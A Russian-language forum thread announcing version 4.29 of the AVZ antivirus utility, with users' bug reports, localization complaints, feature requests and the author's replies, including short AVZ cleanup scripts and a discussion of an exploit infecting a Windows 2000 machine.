# Форум на русском языке  > Решения по информационной безопасности  > Другие программы по безопасности  > Публичное бета-тестирование  >  AVZ 4.29

## Зайцев Олег

Вышла новая версия антивирусной утилиты AVZ - 4.29. Архив с утилитой содержит базу вирусов от 12.12.2007 138934 сигнатуры, 2 нейропрофиля, 55 микропрограмм лечения, 371 микропрограмма эвристики, 9 микропрограмм ИПУ, 66966 подписей безопасных файлов. Новая версия содержит ряд радикальных доработок и усовершенствований. 
Основные модификации: 
[+++] *Интерфейс на нескольких языках*. Локализация интерфейса и протоколов выполняется на основе обновляемых баз, на текущий момент поддерживается русский и английский язык, выбор языка производится автоматически или вручную при помощи параметра командной строки Lang или профиля локализации 
[+++] Новая подсистема - мастер поиска и устранения проблем. Осуществляет автоматический поиск проблем и их автоматическое устранение с функцией резервного копирования и возможностью отмены большинства изменений. Поиск системных проблем и ошибок включен в основную процедуру проверки, результаты выводятся в протокол, раздел номер 9. Одна из функций мастера - чистка приватных данных (протоколы, кукизы, разнообразная история и статистика). Мастер использует обновляемую базу. 
[++] Расширен HTML протокол исследования, в частности добавлена таблица заподозренных файлов без повторов, добавлены интерактивные элементы для генерации команд -  удаление процесса, удаление BHO, управление службами и драйверами 
[++] Скриптовой язык - введены новые команды (в частности, DeleteFileMask для удаления файлов, API для анализа XML базы с результатами исследования системы, вызов исследования системы с детальной настройкой параметров) 
[++] Расширен набор информации, выводимой в XML протокол 
[+] Открытие ключей реестра из скриптов производится в режиме "Только чтение" 
[-] Исправления в XML файле (было дублирование имени тегов для двух разных менеджеров)

Страница загрузки как обычно - http://www.z-oleg.com/secur/avz/download.php

PS: Согласно уже установившейся традиции версии нумеруются через одну (т.е. четный суб-номер у приватной версии для альфа-тестеров, нечетный - у публичной).

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Surfer

А с ADS-малварами ничего нового ?

Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать  :Cheesy:

----------


## Kuzz

Часовой пояс GMT +2, время: 16:42.
Ошибка 503 ...


> Вероятнее всего, превышен лимит подключений


 :Wink:  Показатель востребованности у народа.

*Добавлено через 55 секунд*

*Surfer* опередил)

----------


## SuperBrat

AVZ 4.29 не может установить свой драйвер AVZPM или удалить прежний, если его не удалить в прежней версии AVZ.

*Добавлено через 2 минуты*




> Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать


Скачать 1 Скачать 2

----------


## Mad Scientist

Мастер поиска и устранения проблем- я заблокировал в политики групп изменение стратовой страницы в IE т.к. к-то аутораны с CD дисков их меняли.
Против них это не помогло (всеравно хоть изменение стартовой страницы теперь недоступно этот autorun.exe ее меняет)

Мастер поиска и устранения проблем
"Системные проблемы" или "настройки и твики броузера" 
находит 
"Internet Explorer - заблокирована настройка домашней страницы"
Выбираю исправить  - выделяю -> исправить отмеченные проблемы => успешно исправлены
При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.

----------


## Geser

> А с ADS-малварами ничего нового ?
> 
> Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать


Кому удобнее брать с рапиды http://rapidshare.com/files/76077085/avz4.zip

----------


## NickGolovko

Олег,

что делать со справкой? Теперь у англоязычных юзеров вообще ничего не осталось для понимания утилиты. Я сейчас буду объявлять о билде на Geeks To Go - они меня упрашивали прийти рассказать о продукте, потому что даже с той справкой они не в состоянии были многое понять. Теперь англоязычных материалов, к примеру, по скриптам вообще _не существует в природе_. Вы б хотя бы включили английский хелп в архив под названием avzeng.hlp - и то было бы проще.

Ну и, естественно, меня совершенно не радует тот факт, что часть новых компонентов локализации почему-то по-прежнему проходит мимо меня. На том же Geeks To Go я говорю, что являюсь переводчиком утилиты, что вряд ли можно назвать ложью. Соответственно на меня автоматически ложится ответственность за то, чего я, собственно, не переводил. От ряда фраз я, честно, задумчиво зеленею. Ладно Search for disk files, хотя я несколько раз правил локализацию и в целях единообразия с двумя другими search'aми писал File Search. Но что такое Calk file MD5 hash? Слово calk - специально лезу в 1500-страничный словарь - означает "подковывать". Иногда еще "смолить" и "калькировать". Откуда оно у вас? Я понимаю, хотелось сказать calculate или compute, не хотелось или не успелось побеспокоить меня относительно одной фразы. Но люди-то думают, что переводил я, и делают выводы о _моей_ компетенции. 

В логе нашел:

Thaw-maut end of services is outside of admissible values

Я не переводил такого... У меня мозг заклинивает при попытке понять, что имелось в виду.
Смотрю русский вариант. 

Таймаут завершения служб находится за пределами допустимых значений

Это переводил ПРОМТ?

Откуда-то вновь всплыло старое название первого стандартного скрипта. Тоже не понимаю... я вроде исправлял...

Я не пытаюсь придраться, но, как уже сказано выше, время от времени всплывают такие огрехи, которые мешают продвигать продукт за рубежом.

Что касается собственно функционала, то, безусловно, сделано несколько важных шагов вперед; по крайней мере, у англичан есть теперь последняя версия движка утилиты.

----------


## Muffler

Кстати неплохо бы сделать меню или диалог вибора языка, который бы добавлял нужный .loc файл.

----------


## Nick222

У меня плагин для Бата с новым АВЗ почему-то пишет:



> Настройки загружены. Путь к AV базам: "C:\Program Files\avz4\BASE\"
> Загрузка AV базы. Путь к базе = "C:\Program Files\avz4\BASE\"
> Ошибка загрузки баз. Дополнительная информация:


И всё...
Хотя упомянутая директория существует и там есть база.
Может большие буквы отличаются от маленьких?

----------


## RiC

Небольшое замечания - свежий UPX с ключем --brute упаковывает AVZ.exe на 10% лучше что слегка уменьшит дистрибутив.

*Добавлено через 1 минуту*




> У меня плагин для Бата с новым АВЗ почему-то пишет:
> Может большие буквы отличаются от маленьких?


В новой версии новый формат баз, возможно из-за этого.

----------


## Зайцев Олег

> Небольшое замечания - свежий UPX с ключем --brute упаковывает AVZ.exe на 10% лучше что слегка уменьшит дистрибутив.
> 
> *Добавлено через 1 минуту*
> 
> 
> В новой версии новый формат баз, возможно из-за этого.


новую версию так и запакую (сборку дистрибутива делает автоматика, там вызывается какой-то UPX, я даже версию его не помню ...
Насчет плагина - да, он работать не будет, нужно качать новый плагин и заменять им старый (на страничке загрузки я про это написал).

*Добавлено через 51 секунду*




> Кстати неплохо бы сделать меню или диалог вибора языка, который бы добавлял нужный .loc файл.


В меню это сделать нельзя - ядро начинает использовать локализацию с момента инициализации, поэтому налету поменять язык сложно.

*Добавлено через 4 минуты*




> Олег,
> что делать со справкой? 
> ....
> Ну и, естественно, меня совершенно не радует тот факт, что часть новых компонентов локализации почему-то по-прежнему проходит мимо меня. 
> ...
> Что касается собственно функционала, то, безусловно, сделано несколько важных шагов вперед; по крайней мере, у англичан есть теперь последняя версия движка утилиты.


База там здоровенная, я поэтому и выкладывал альфу, чтобы отловить все ляпы. Я завтра я пришлю базы локализатора на выверку, кое что там действительно добавлялось "на коленке" ... но это не проблема - база локализации обновляется вместе с сигнатурной, а через недельку выйдет 4.29.xxxx - исправленный и доработанный билд 4.29. заодно и хелп английский туда поместим

*Добавлено через 1 минуту*




> Мастер поиска и устранения проблем- я заблокировал в политики групп изменение стратовой страницы в IE т.к. к-то аутораны с CD дисков их меняли.
> Против них это не помогло (всеравно хоть изменение стартовой страницы теперь недоступно этот autorun.exe ее меняет)
> 
> Мастер поиска и устранения проблем
> "Системные проблемы" или "настройки и твики броузера" 
> находит 
> "Internet Explorer - заблокирована настройка домашней страницы"
> Выбираю исправить - выделяю -> исправить отмеченные проблемы => успешно исправлены
> При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.


Политика в HKLM или HKCU прописана ? Визард в HKCU проверял и фиксил, HKLM не трогал. Я ввел контроль HKLM в этой проверке, завтра в апдейт он попадет

*Добавлено через 2 минуты*




> А с ADS-малварами ничего нового ?
> 
> Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать


ADS вроде фиксил, если недофиксил - в сборке 4.29.xxxx точно добью. Сайт действительно временами залипает, народу много набежало за релизом  :Smiley:

----------


## SuperBrat

> Насчет плагина - да, он работать не будет, нужно качать новый плагин и заменять им старый (на страничке загрузки я про это написал).


Я качал недавно, там прежняя версия плагина и редактор тоже старый.

----------


## Jef239

> AVZ 4.29 не может установить свой драйвер AVZPM или удалить прежний, если его не удалить в прежней версии AVZ.


Олег, а нельзя это зафиксить? Ну повезло мне, что старую версию AVZ не удалил. Но что сейчас,  к юзерам ещё на всякий случай возить с собой старый AVZ?
А у юзеров интернет может быть и модемный....

Олег, хоть на сайте напиши крупными буквами, что нужно удалять старый драйвер перед установкой новой AVZ.

Кстати, скажи имя драйвера, чтобы можно было его руками из реестра вычистить.

*Добавлено через 27 минут*




> Мастер поиска и устранения проблем
> "Системные проблемы" или "настройки и твики броузера" 
> находит 
> "Internet Explorer - заблокирована настройка домашней страницы"
> Выбираю исправить  - выделяю -> исправить отмеченные проблемы => успешно исправлены
> При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.


Аналогичная проблема с ошибкой "Таймаут завершения служб находится за пределами допустимых значений". Тоже не устраняется.

*Добавлено через 5 минут*




> Политика в HKLM или HKCU прописана ? Визард в HKCU проверял и фиксил, HKLM не трогал. Я ввел контроль HKLM в этой проверке, завтра в апдейт он попадет


А может тем же путём и проблема с  "Таймаут завершения служб находится за пределами допустимых значений" пофиксится? Кстати, а нельзя как-то (в хинтах, логе или где) показывать  путь в реестре к изменяемому ключу?
Потому как мне путь к рестру даст возможность поискать в инете, что это за проблема и надо ли лично мне её фиксить. А вот название ни о чём не говорит.

*Добавлено через 46 минут*

F:\Jef\Misc\Foto\Женька_фото.rar - PE файл с нестандартным расширением(степень опасности 5%)

Гм, а сложно научить AVZ понимать автораспаковываемые RAR и ZIP архивы? То ест сообщение верное, но я бы добавил, что это автораспаковываемый RAR-архив.

----------


## AStr

W2k/sp4 rus
Стандартные скрипты - №2
После выдачи сообщения:
Проверка завершена
Просканировано файлов: 293, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 13.12.2007 8:40:54
Сканирование длилось 00:00:33
Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
то Вы можете обратиться в конференцию - http://virusinfo.info

Окно с ошибкой: Invalid variant type

Логи не создаются

----------


## Зайцев Олег

Имя драйвера уникально для каждого ПК, поэтому есть скрипт для удаления всех драйверов:
*begin*
 ExecuteStdScr(6);
*end*.
Этот скрипт можно вызвать из меню "Файл/Стандартные скрипты", номер 6. Этот скрипт зачистит все "хвосты" от текущей или предыдущей версии AVZ.
С таймаутом завершения служб сейчас разберусь (путь в реестре показать невозможно, т.к. скрипт с GUI взаимодействует только на уровне "проискать проблему", "пофиксить проблему", "откатить изменения".
С архивами - AVZ распознает SFX архив и проверяет его, но у него есть две независимых проверки. Одна поймет, что это архив - и проверит его. А вторая поймет, что EXE файлу по непонятной причине дано расширения RAR - и напишет об этом в логе

----------


## Jef239

> Имя драйвера уникально для каждого ПК, поэтому есть скрипт для удаления всех драйверов:
> *begin*
>  ExecuteStdScr(6);
> *end*.
> Этот скрипт можно вызвать из меню "Файл/Стандартные скрипты", номер 6. Этот скрипт зачистит все "хвосты" от текущей или предыдущей версии AVZ.


Олег, отпиши http://www.z-oleg.com/secur/avz/download.php что это НУЖНО сделать при установке новой версии поверх предыдущей.



> С таймаутом завершения служб сейчас разберусь (путь в реестре показать невозможно, т.к. скрипт с GUI взаимодействует только на уровне "проискать проблему", "пофиксить проблему", "откатить изменения".


Есть ещё одно взаимодействие - на уровне "Название проблемы". Вот там (или в хелпе) хотелось бы иметь информацию о проверяемых ключах. Гм, а в лог у тебя сам скрипт не пишет? Просто ещё лучший канал для взаимодействия - это запись в лог.



> С архивами - AVZ распознает SFX архив и проверяет его, но у него есть две независимых проверки. Одна поймет, что это архив - и проверит его. А вторая поймет, что EXE файлу по непонятной причине дано расширения RAR - и напишет об этом в логе


А вторая проверка не может взять информацию от первой?

_ >> Опасно ! Обнаружена маскировка процессов
1.2 Поиск перехватчиков API, работающих в KernelMode
Ошибка в работе антируткита [Failed to set data for 'DisplayName'], шаг [14]
_
Это я запустил нейратлизацию перехватов в UserMode. А без него - всё работает:

_Проверено функций: 248, перехвачено: 34, восстановлено: 0
1.3 Проверка IDT и SYSENTER
 Анализ для процессора 1
 Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
 Поиск маскировки процессов и драйверов завершен
_

*Добавлено через 2 минуты*




> W2k/sp4 rus
> Стандартные скрипты - №2
> После выдачи сообщения:
> Проверка завершена
> Просканировано файлов: 293, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
> Сканирование завершено в 13.12.2007 8:40:54
> Сканирование длилось 00:00:33
> Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
> то Вы можете обратиться в конференцию - http://virusinfo.info
> ...


ПОДТВЕРЖДАЮ. Тоже W2k/sp4 rus

----------


## santy

Олег, добрый день. Второй раз сталкиваюсь с ситуацией когда скрипт отложенного удаления с включенным AVzGuard и антируткитом не срабатывает при удалении ntos.exe. Возможно, потому что прописаны атрибуты файла: для чтения. В первый раз проблема решилась изменением имени ntos.exe_ в строке реестра... в этот раз не помогло, запись ntos.exe восстанавливалась ...ntos.exe_, ...ntos.exe и т.д. удалить ntos.exe возможно было только: включив AVZGuard, в regedit убрать в реестре загрузку ntos.exe. После перезагрузки с включенным AVZGuard ntos.exe становится виден в system32 с атрибутом для чтения.

----------


## Зайцев Олег

> Олег, добрый день. Второй раз сталкиваюсь с ситуацией когда скрипт отложенного удаления с включенным AVzGuard и антируткитом не срабатывает при удалении ntos.exe. Возможно, потому что прописаны атрибуты файла: для чтения. В первый раз проблема решилась изменением имени ntos.exe_ в строке реестра... в этот раз не помогло, запись ntos.exe восстанавливалась ...ntos.exe_, ...ntos.exe и т.д. удалить ntos.exe возможно было только: включив AVZGuard, в regedit убрать в реестре загрузку ntos.exe. После перезагрузки с включенным AVZGuard ntos.exe становится виден в system32 с атрибутом для чтения.


1. В AVZ 4.29 есть фича убивания процесса (есть в HTML логе)
2. Для удаления ntos.exe следует применять BootCleaner, а не отложенное удаление

----------


## Nick222

Олег, огромное спасибо за новую версию!  :Smiley: 

Наконец скачал плагин для Бата.
Единственная просьба - нельзя ли внутри в плагине поставить текущий номер версии, а то на сайте написано 4.29, а внутри в инфе плагина всё ещё 4.23  :Smiley: 

Спасибо ещё раз!

----------


## Ego1st

> 2. Для удаления ntos.exe следует применять BootCleaner, а не отложенное удаление


на 4.27 не срабатывал BootCleaner при удалении ntos.exe проверял на 3 машинах..

----------


## Макcим

По порядку: 
1. В логе не хватает команды "Карантин через BC"
2. В логе команды располагаются не логично, т.е. пример служба iPod Service. При нажатии Стоп, Удалить, Отключить генерируется следущий скрипт

```
begin
 DeleteService('iPod Service');
 SetServiceStart('iPod Service', 4);
 StopService('iPod Service');
end.
```

Во-первых лучше выполнять такие действия через BC, во-вторых порядок не правильный. 
3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Ego1st

Олег хотелось бы услышать ответ на вот этот вопрос.. 
http://virusinfo.info/showpost.php?p...&postcount=276
это у меня кривые руки или в базах непорядок был..

----------


## Geser

> По порядку: 
> 1. В логе не хватает команды "Карантин через BC"
> 2. В логе команды располагаются не логично, т.е. пример служба iPod Service. При нажатии Стоп, Удалить, Отключить генерируется следущий скрипт
> 
> ```
> begin
>  DeleteService('iPod Service');
>  SetServiceStart('iPod Service', 4);
>  StopService('iPod Service');
> ...


Я думаю эти команды не должны использоваться вместе. Просто при команде удаления АВЗ должен останавливать сервис, а потом удалять.

----------


## Макcим

> Я думаю эти команды не должны использоваться вместе. Просто при команде удаления АВЗ должен останавливать сервис, а потом удалять.


Практика показывает, что при использовании вначале остановки\выгрузки службы\драйвера лучше удаляется. Я не могу доказать свою правоту, но на практике я часто это наблюдаю. Тоже касается удаление через BC, Олег говорит, что нет разницы между скриптами, но последний работает эффективнее

```
begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(true);
 DeleteFile('C:\WINDOWS\Temp\startdrv.exe');
 BC_ImportDeletedList;
 BC_Activate;
 RebootWindows(true);
end.
```



```
begin
 BC_DeleteFile('C:\WINDOWS\Temp\startdrv.exe');
 BC_Activate;
 RebootWindows(true);
end.
```

----------


## drongo

В логах  добавить кнопочку удаления для DPF , аналогично той что добавили для BHO  :Wink: 

```
O16 - DPF: {11111111-1111-1111-1111-222222222222} -
```

Также добавить, если сам файл отсутствует  в компьютере -> (file missing) Это организовано в hijack  this, очень удобно.

----------


## tar

какая-то ерунда с ревизором.
Например:
$AVZ0288 
$AVZ0072 13.12.2007 8:57:59
$AVZ0249
$AVZ0121
c:\windows\123.exe = $AVZ1124
$AVZ1046

----------


## Bratez

> ...Во-первых лучше выполнять такие действия через BC, во-вторых порядок не правильный...


Я бы сказал больше: вместо этих трех команд хотелось бы видеть две другие, а именно BC_QrSvc и BC_DeleteSvc, т.к. в основном именно они применяются хелперами.

----------


## Зайцев Олег

Вышла обновленная версия 4.29.0.9, путь загрузки прежний. Изменения:
* Исправлен баг с выводом в лог сообщений ревизора
* Исправлена ошибка в работе визардов - исправление проблемы не отрабатывало как положено
* В HTML лог добавлен интерактив для генерации строк скрипта, удаляющих DPF

----------


## Geser

Если кому нужно на рапиде http://rapidshare.com/files/76278583/avz429.zip

----------


## drongo

> Я бы сказал больше: вместо этих трех команд хотелось бы видеть две другие, а именно BC_QrSvc и BC_DeleteSvc, т.к. в основном именно они применяются хелперами.



Верно, очень не хватает.

----------


## Зайцев Олег

> Если кому нужно на рапиде http://rapidshare.com/files/76278583/avz429.zip


Я поместил линк на рапиду на странице загрузки, но приходится его постоянно обновлять - перезагрузки файла там не предумострено, а URL на каждую загрузку меняется

*Добавлено через 2 минуты*




> Верно, очень не хватает.


Не хватает - приделаю. Тем более что релиз однозначно обновится, когда *NickGolovko* выверит перевод.

----------


## Geser

> Я поместил линк на рапиду на странице загрузки, но приходится его постоянно обновлять - перезагрузки файла там не предумострено, а URL на каждую загрузку меняется


Так даже лучше. Нет проблем с кешированием. Кстати, у меня с .ру не всегда качается. Так что лучше делать две копии. Одну на ру вторую на ком

----------


## drongo

Говоря о переводе...До сих пор написано File-> "Cleat the log" - Что это за  "Cleat" остаётся загадкой...Должно быть Clear
Страница с объяснениями на русском про скрипты- умерла смертью храбрых, нужно вернуть и также на английский перевести .
версия английского  генератора скриптов была бы полезна  :Wink:

----------


## Jef239

> Вышла обновленная версия 4.29.0.9, путь загрузки прежний. Изменения:


Баг с Invalid Variant Type - в полный рост. Мне из-за этого для раздела "помогите" лог не собрать. 

Потому как сам не понимаю, как вирус проникает. То есть картинка такая. CMD.EXE запускает FTP.EXE, тот хочет скачать зверя по иени NOTEPAD.EXE. FTP.EXE файрволл притормозил. Но кто запустил CMD.EXE - не понимаю.

Пока пара FTP.EXE болтается в приторможённом состоянии.

----------


## Макcим

Так будет "Карантин через BC" и правильное расположение команд в поле для генерации скрипта?

----------


## Зайцев Олег

> Баг с Invalid Variant Type - в полный рост. Мне из-за этого для раздела "помогите" лог не собрать. 
> 
> Потому как сам не понимаю, как вирус проникает. То есть картинка такая. CMD.EXE запускает FTP.EXE, тот хочет скачать зверя по иени NOTEPAD.EXE. FTP.EXE файрволл притормозил. Но кто запустил CMD.EXE - не понимаю.
> 
> Пока пара FTP.EXE болтается в приторможённом состоянии.


А кто Firewall в данном случае - не Outpost посленей версии грешным делом ?

*Добавлено через 1 минуту*




> Так будет "Карантин через BC" и правильное расположение команд в поле для генерации скрипта?


Команды я переставлю, про карантин BC подумаю - вероятность его включения невелика. Дело в том, что обычный карантин не карантинит чистые файлы, BC карантинит все, что ему покажут.

----------


## Макcим

> Команды я переставлю, про карантин BC подумаю - вероятность его включения невелика. Дело в том, что обычный карантин не карантинит чистые файлы, BC карантинит все, что ему покажут.


Карантин чистых файлов - это не опасно, удаление куда страшнее.

----------


## Jef239

> А кто Firewall в данном случае - не Outpost посленей версии грешным делом ?


Outpost. Только не последней (шестой), а четвёртой. А что,  есть трояны, которые именно через него работают?

----------


## Зайцев Олег

> Outpost. Только не последней (шестой), а четвёртой. А что, есть трояны, которые именно через него работают?


Ну, трояны и outpost я немментировать не буду (так как не этично), но дам подсказку - запуск TFT/TFTP скорее всего следствие эксплоита, следовательно или outpost по непонятной причине пропускает пакеты с эксплоитом на компьютер (нарушена его работа, правила корявые и т.п.), или он вообще толком не работает (правила, повреждение трояном).

----------


## tar

теперь ревизор совсем накрылся - не проверяет файлы по таблицам

----------


## Макcим

> 3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.


А это будет реализовано или нет?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зайцев Олег

> А это будет реализовано или нет?


А что, оно не работает сейчас ? Вроде как должно ... по крайней мере в логи исследования информация о них пишется, эжто проверено. Про скрипт сбора файлов вроде речь не шла, когда обсуждали доработки

----------


## Макcим

Должно быть Вы просто не заметили моё сообщение. Сейчас скрипт собирает только запущенные драйвера.

----------


## Jef239

> Ну, трояны и outpost я немментировать не буду (так как не этично),


Этично - я и там бета-тестер.  :Smiley: 




> но дам подсказку - запуск TFT/TFTP скорее всего следствие эксплоита, следовательно или outpost по непонятной причине пропускает пакеты с эксплоитом на компьютер (нарушена его работа, правила корявые и т.п.), или он вообще толком не работает (правила, повреждение трояном).


Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.

Мне другое непонятно:
1) Через какую дырку входит эксплойт.
2) Почему AVZ не видит, что эксплойт работает.
3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
4) Ну и главное. Нет ли спрособа заделать эту дырку.

Да, все последние патчи, что MS, что FireFox разумеется поставлены.

----------


## LoMo

Доброго времени суток !

Скачал новую AVZ 2.29 проверил и мне выдало :

9. Мастер поиска и устранения проблем
 >>  Таймаут завершения служб находится за пределами допустимых значений

Этот как понять? если это вредно/опасно то можно уменьшить его как то ? если да то где...

Заранее благодарен.

----------


## Mad Scientist

> теперь ревизор совсем накрылся - не проверяет файлы по таблицам


Подтверждаю, ревизор накрылся, и у типа файлов для ревизора(frz) стоит странное название: "$avz1129" но это мелочи

----------


## Зайцев Олег

> Этично - я и там бета-тестер. 
> 
> 
> Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.
> 
> Мне другое непонятно:
> 1) Через какую дырку входит эксплойт.
> 2) Почему AVZ не видит, что эксплойт работает.
> 3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
> ...


Могу угадать - система W2K, последние обновления стоят ? Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями. И есть размножающийся по сети зловред - из семейства RBOT, который эти уязвимости эксплуатирует. Т.е. если он гуляет в локальной сети, то спасения от него нет (кроме как убрать протоколы MS (общий доступ к файлам и принтерам и клиент для сети MS), оставив в настройках сетевого соединения только TCP/IP). 
1. См. выше
2. А он и не увидит. Эксплоит - это же 20-30 байт кода где-то в памяти легитимного процесса (подробно описывать долго - есть хорошая книжка Криса Касперски, там даже пример есть эксплоита и демонстрания его работы).
3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать
4. Установить XP или отключиться от сети MS. Есть конечно путь временной защиты - переименовать ftp.exe и tftp.exe в что-то там типа _ftp.exe и _tftp.exe

----------


## Tarik

Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог _virusinfo_syscure.zip_ для раздела* "Помогите"*

----------


## Зайцев Олег

> Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог _virusinfo_syscure.zip_ для раздела* "Помогите"*


А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить *avz.exe lang=ru* - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.

----------


## Tarik

> А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить *avz.exe lang=ru* - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.


ОС русскоязычная XP SP2 с последними заплатками
А как запустить *avz.exe lang=ru?* Просто переименовать екзешник?

Переименовал, все по-старому

----------


## Jef239

> Могу угадать - система W2K, последние обновления стоят ?


Угу. W2K, и всё обновлено.



> Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями.


О!!!!! Спасибо за информацию. Первый разумный довод в пользу установки XP, кстати. Просто есть хорошее правило - не ставить новую ОС до выхода SP3. Потому и сижу на W2K.




> 3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать


И тем не менее, есть две вещи, которые были бы ОЧЕНЬ полезны в данной ситуации.
1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)
2) Просмотр командной строки, с которой запущен процесс.
При помощи первой я понял, через кого внедряется эксплойт и закрыл приложение от сети получше. А вторая полезна, чтобы отличить "зловредный" CMD.EXE от нормального.

Олег, если не трудно, впиши в список пожеланий?




> 4. Установить XP или отключиться от сети MS.


Сети MS у меня нет. Я же дома работаю. А внедрялся он похоже через SQLServer.  По крайней мере дерево запуска было такое - SQLServer-CMD-FTP. Пока прикрыл его FireWallом получше. Не поможет - врублю проактивку и впрямь XP поставлю.

*Добавлено через 3 минуты*




> А как запустить *avz.exe lang=ru?*



Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - *avz.exe lang=ru
*Ну и запускай его вместо AVZ




> Переименовал, все по-старому


Теперь обратно переименовывай.

*Добавлено через 1 минуту*

P.S. "Сети MS у меня нет" читать как давно отключен и доступ к файлам и доступ к принтерам. На уровне свойств сетейвой карты отключен.

----------


## Tarik

> Создай командный файл CMEРТ_OT_CMEXA.CMD.
> Впиши туда одну строчку - *avz.exe lang=ru*
> Ну и запускай его вместо AVZ


Как создать командный файл? Извини, что туплю, не шарю в этих вопросах

----------


## Jef239

> Как создать командный файл?


Например в NotePad (блокноте)

----------


## Tibet

Здравствуйте, Олег!

AVZ выдал: "таймаут завершения служб находится за пределами допустимых значений" - что это такое и что с ним делать?
Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
Можно с этим справиться?
Спасибо! С уважением, Павел.

----------


## Mad Scientist

А почему тема переехала в  "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...

----------


## Зайцев Олег

> А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
> Хотя модераторам виднее...


Не знаю - я вроде не переносил ...

*Добавлено через 4 минуты*




> Здравствуйте, Олег!
> 
> AVZ выдал: "таймаут завершения служб находится за пределами допустимых значений" - что это такое и что с ним делать?
> Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
> Можно с этим справиться?
> Спасибо! С уважением, Павел.


Таймаут завершения служб находится за пределами допустимых значений - это нужно понимать буквально. Какой-то кривой твикер решил "ускорить" работу системы, предписав таймаут на завершение служб порядка 1 секунды. Многие службы за это время понятное дело завершиться не могут, и при завершении ПК система начинает их принудительно прибивать. Последствия понятное дело непредсказуемы. Лечится из меню "Файл/Мастер поиска и устранения проблем" в AVZ

----------


## Макcим

Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

----------


## zerocorporated

> Как создать командный файл? Извини, что туплю, не шарю в этих вопросах


В блокнот скопируйте:


```
avz.exe lang=ru
```

И при сохранение документа выберете: *Тип файлов: все файлы.*
Укажите имя файла например avz.cmd или avz.bat

Тут главное чтоб расширение файла было cmd или bat

----------


## anton_dr

> А почему тема переехала в  "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
> Хотя модераторам виднее...





> Не знаю - я вроде не переносил ...


Видимо, я немножко коряво присоединил одно сообщение

----------


## NickGolovko

Олег, с Geeks To Go пришел первый фичреквест.  :Smiley:  Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).

----------


## Зайцев Олег

> Олег, с Geeks To Go пришел первый фичреквест.  Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).


В теории это возможно, только нужно ли ?! В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## HEKTO

> Создай командный файл CMEРТ_OT_CMEXA.CMD.
> Впиши туда одну строчку - *avz.exe lang=ru
> *Ну и запускай его вместо AVZ


